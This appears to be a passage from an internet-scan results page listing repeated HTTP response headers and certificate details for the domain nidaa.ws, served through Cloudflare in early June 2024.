    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f84c5e29a98c87-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-06 10:39

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 10:39:34 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXUp7IY0mg98hKvszZarVo71iKaDoQJXqkLGRD6eqg48mLY0M71YrbUD4aMVCD7KxazdEXvK2C2WfHqoQI%2FE4WO8ewLDMl84tVs7mq7KTg3yGKfthKPSv6OEAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f7c7800c7c66a6-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-06 08:51

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 08:51:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWjNaTpxXgq9%2FqIcoZM%2FwFRjODTdPB9Nuh1i8nAqJSn%2F5QOTwPdFN9uljm%2BFhunwxd%2FzWC7na4fy25hgziIhR72eD%2FGLa4ZAz%2B7BwpZNCv8eGi0F2a49YrujoA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f7287c7e5741c3-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-06 07:40

    HTTP/1.1 200 OK
    Date: Thu, 06 Jun 2024 07:40:47 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymlVwkihwyaxZkjYzK%2BDVtys6J%2Bo05MvvZa3i%2BCZFakzqMejUVUMM%2BGfMUAY0HvX8mb3rtu%2B%2FioGU7PA4Llh%2B4OIvOcsybe%2FGuDcQQd4BvN1EuXQxNc5vYI7nw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88f6c19b3b7c2364-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-06 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-04 19:56

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 19:56:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2KdfQ4g8pDkBMnVjgovsjLU01msumtmQpjnInxhjMGnR3yy%2BX1FsVMsB81p%2B9JgZG2n7aIBZLoJNQrhikfMjYbHde2vNRG2CY83eqbUVaIcFFTVkLxoZVCouaFOhfg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea7c182acd9705-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-04 18:54

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGodIRUw6c%2FYORLQQOC9DJPGHFzNmCNWHMLDq5jHYFJJGblSN%2F9VlKrzbYtPnpniPhYxRPJAr%2F%2FCIdXt%2FJ%2FCC%2FWEwrlYbpvZQ8zy3obes0C0x4F0HAwMDZR%2BzMnhJwE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea220968c10a67-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-04 14:55

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 14:55:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JOrH7VYxkLY3uxH4PiA0g2%2Fzx7aEDyokfzSbVKC1%2Bt%2FsiupwSeDexwiaDYKtzqAWwLh53zmXQYV1fJp4T5zME24qGnGvXezn27MJxhvDVMzPepL1Q1JD2mEiRA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e8c3d1eba65c56-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-04 11:50

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 11:50:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvIO9k1TMSwaRYswmZrU5juS%2BxyjVkpWKbglPIG%2BOhq%2B5DktMcfUwKwT0lix7r9iADJQgYdHWDiHgbgsnOg%2FOSjPIqVR94wQ90DkQ9lSkeukvrIevXFmu7hYnw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e7b4e21830abe2-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-04 09:50

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 09:50:52 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9IoVAF6RdjcNC1MNGQ5Mn%2FkHTGUL1yR77eKhLdljIZE%2BHSTGUhhppjukY8HUiskkbHX2KIMgD177fgYK9Mz5Hp87AbFhwH6XwgTebzyro7xZ%2Bt%2FFgKIyjQe%2FEGzHzI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e705681cdb39e3-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-04 09:50

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 09:50:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgrYdeLc46JLj1QB1pdtM5PgJP3ob8BeBZS0ErLixZfYHQ9CojFGFjf2mcF9cyD8%2FDbdgl%2BtsqhxWOPTfDbe6KcPgk%2BSFDRDsamGZe33BkDwQ9SG6J0FdU4EHNDPEfg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e7053bacadaabf-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-04 09:28

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 09:28:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pP12px8g%2Bx5kdwi21s70bDUnPq9rdeVloT4excJZ8tw5epos1u%2FTaNdIYYz19v2qg3bN9A6jv3Qxv2LS%2B8QnDHfugVUqbADXBxobYMFDxQqQwnIt2x%2BJMpl3Ng%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e6e4c6fa92a043-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-04 09:06

    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 09:06:26 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAPUPVj74%2Bit7CsPdjZ4uBuO3XmCNVU9yTvd23bC0T7AwswTv1%2BjO2UiHOe7xN7wlPp4ICpyIVFsz4%2F60d9tojZrKgGuUZAcHv01AC9Ge4aiTOXOgR3wDIUvmg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88e6c44ecaa317ec-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-04 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-03 00:56

    HTTP/1.1 200 OK
    Date: Mon, 03 Jun 2024 00:56:37 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPJHC3Pwv7uZpwl92lDLStqbvBV54n6ONBPOWZQYxh7WCsL6fsMt8GEEe2m0I4Z3iMUDNsdnqbYnjqVf6kD74ZgXB9tl2Looex9tn1%2Bh9tS6CTJaqaIM%2Bl75S3adSTc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88dbb9716fb69055-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-03 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-02 17:15

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 17:15:57 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8157b3tb9wFZ4f99C%2Bp7Y11CDFm2peAhdah5NBtTfGr08jvGaX8vBS1lOBTV5%2BXRlLU2XHxNSN%2F4O%2FPWIPBn7k3xOkGIRuyd1AVGzWqNaNqwXbEP4KnJ8H5qm7DwZ0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d916a1dd1092b7-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-02 16:18

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 16:18:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vxT2NGZLyETR9%2FAZkNTywHa3A6axZY%2BQBTOO%2FWvBIEgE2Hr75xpYgYU5YhYd6cbkZ3%2BW5IVDStu2DfEDmB%2B48W5ZThS5j%2FsXImB2S6kjBIvffGA9oaj5oV%2BMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d8c1f7ace9c33f-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-02 14:37

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 14:37:14 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RB9CiiaBYwvKUuxDaG194FVnOT1bVkCsIn9ZJB7JR3eFvp3dvtvxpabMjIp38%2BbdeZozEp8pfzWKSylToyQQ3W0il1i0cQf4S3AzThDc5Lm3i2A4J%2BV0cuq93g%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d82e284e799be8-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-02 11:50

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 11:50:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aikxGvrj%2Fi%2FbEk6%2FREnkyq38wCawTzKyAzY8gvAE2cAAA2h%2BRYfT7JgPNCB27AgU%2FoexJ7MTFfdmW%2FBs2ea8eRzjc8SINsuwrY9HxVfkq1jig17lP%2F9nInljglu06xI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d739519c14907c-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-02 11:50

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 11:50:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFASYqXg0Au8IXvZfu7FJuqes2zYcd0BCHdPnQlRekD6%2BHCN3l76fpqsL33WDII99LopL0cpGVinQQ3i5EHvdhyYx5jgXpk3ucUtLfuJnFYvDqRkEiSBVvryMegZMCA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d7394eaf934db5-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-02 11:41

    HTTP/1.1 200 OK
    Date: Sun, 02 Jun 2024 11:41:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4CKEO26360b57pYTQNGGsHtLtiLyV4DZ2Jj3UppEHqA%2F3qLO5GszejCX7P45JS3hfNS%2FoBP0FSDOj5YjIAL%2FPM4siYWKMtMsmJEeC%2FtCEr0tLTDxXA5%2FlDSMfA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88d72d0e2f502868-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-02 by HttpPlugin
    Create report
nidaa.ws*.nidaa.ws
CN:
nidaa.ws
Key:
RSA-2048
Issuer:
Not before:
2024-05-26 04:14
Not after:
2024-08-24 04:14
Domain summary